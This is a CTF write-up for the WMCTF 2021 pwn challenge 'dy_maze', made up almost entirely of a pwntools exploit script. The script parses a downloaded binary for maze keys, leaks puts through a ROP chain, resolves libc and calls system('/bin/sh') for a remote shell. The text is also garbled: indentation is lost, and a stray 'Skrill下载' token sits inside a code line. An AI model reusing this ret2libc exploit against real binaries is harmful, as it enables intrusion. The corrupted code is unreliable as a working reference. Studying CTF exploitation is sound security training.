WMCTF 2021 pwn dy_maze writeup

Posted Gendan


import os
import subprocess
from binascii import a2b_base64

from pwn import *
from LibcSearcher import *
context(log_level=\'debug\', os=\'linux\', arch=\'amd64\', bits=64)
context.terminal = [\'/usr/bin/x-terminal-emulator\', \'-e\']

Interface

local = False

binary_name = "dy_maze"

binary_name = "38a5a00c-08ac-11ec-b124-0242ac110003"
port = 44212
if local:

p = process(["./" + binary_name])
e = ELF("./" + binary_name)
# libc = e.libc

else:

p = remote("47.104.169.32", port)

def z(a=\'\'):

if local:
    gdb.attach(p, a)
    if a == \'\':
        raw_input()
else:
    pass

ru = lambda x: p.recvuntil(x)
rc = lambda x: p.recv(x)
sl = lambda x: p.sendline(x)
sd = lambda x: p.send(x)
sla = lambda delim, data: p.sendlineafter(delim, data)
def encode(payload, offset):

# encode
payload_encoded = b\'\'
for i in range(len(payload)):
    payload_encoded += (payload[i] ^ success_temp[(i + offset) % 5]).to_bytes(1, \'little\')
return payload_encoded

Others

success_temp = []

Main

if name == "__main__":

# z(\'b maze_25\')
z(\'b ok_success\\n\')

initialize

p.recvuntil(b\'Solution?\')
confirm = input()
sl(confirm)

Create binary file

ru(b\'Binary Download Start\')
ru(b\'\\n\')
b64_data = p.recvuntil(b\'\\n==\', drop=True)
with open(\'temp.bz2\', \'wb\') as f:

f.write(a2b_base64(b64_data))

ru(b\'\\n\')
temp_binary = Skrill下载os.popen(\'tar -xjvf temp.bz2\').read().strip(\'\\n\')
e = ELF("./" + temp_binary)

# Start ELF Analysis
d = {}
for i in range(1, 81):
    d[i] = e.symbols[\'maze_{}\'.format(i)]
maze_address = sorted(d.items(), key=lambda x: x[1])
key = {}
for ind, addr in zip(range(80), e.search(b\'\\x83\\xc0\\x01\')):
    addr -= 4
    while e.data[e.vaddr_to_offset(addr): e.vaddr_to_offset(addr) + 3] != b\'\\x83\\x7d\\xfc\': addr -= 1
    key[maze_address[ind][0]] = e.data[e.vaddr_to_offset(addr) + 3]
for addr in e.search(b\'\\x48\\x98\\x88\\x54\\x05\\xEC\'):
    success_temp.append(e.data[e.vaddr_to_offset(addr) - 1])
prdi = next(e.search(b\'\\x5f\\xc3\'))
# End Analysis
# key[80] = 32
payload = b\'\'
for i in range(1, 81):
    payload += str(key[i]).encode(\'utf-8\') + b\' \'
# ok_success
payload += str(100).encode(\'utf-8\')    
sl(payload)
sleep(2)
# p.recvall()
ru(b\'Good\')
# sl(b\'100\')
sleep(2)
# input your name:
payload = b\'a\' * 0x14 + b\'b\' * 8 + p64(prdi) + p64(e.got[\'puts\']) + p64(e.plt[\'puts\']) + p64(e.symbols[\'ok_success\'])
sl(encode(payload, 0))
# sl(payload)
sleep(2)
ru(b\'name: \')
puts_addr = p.recvuntil(b\'\\n\', drop=True).ljust(8, b\'\\x00\')
puts_addr = u64(puts_addr)
log.success("puts addr found: " + hex(puts_addr))
libc = LibcSearcher(\'puts\', puts_addr)
# libc.select_libc(9)
libc_base = puts_addr - libc.dump(\'puts\')
log.success(\'libc base found: \' + hex(libc_base))
p.sendlineafter(b\'length\', str(100).encode(\'utf-8\'))
# Attacking:
payload = b\'a\' * 0x14 + b\'b\' * 8 + p64(prdi) + p64(libc.dump(\'str_bin_sh\') + libc_base)
payload += p64(prdi + 1) + p64(libc.dump(\'system\') + libc_base)
sla(b\'name: \', encode(payload, 1))
p.interactive()
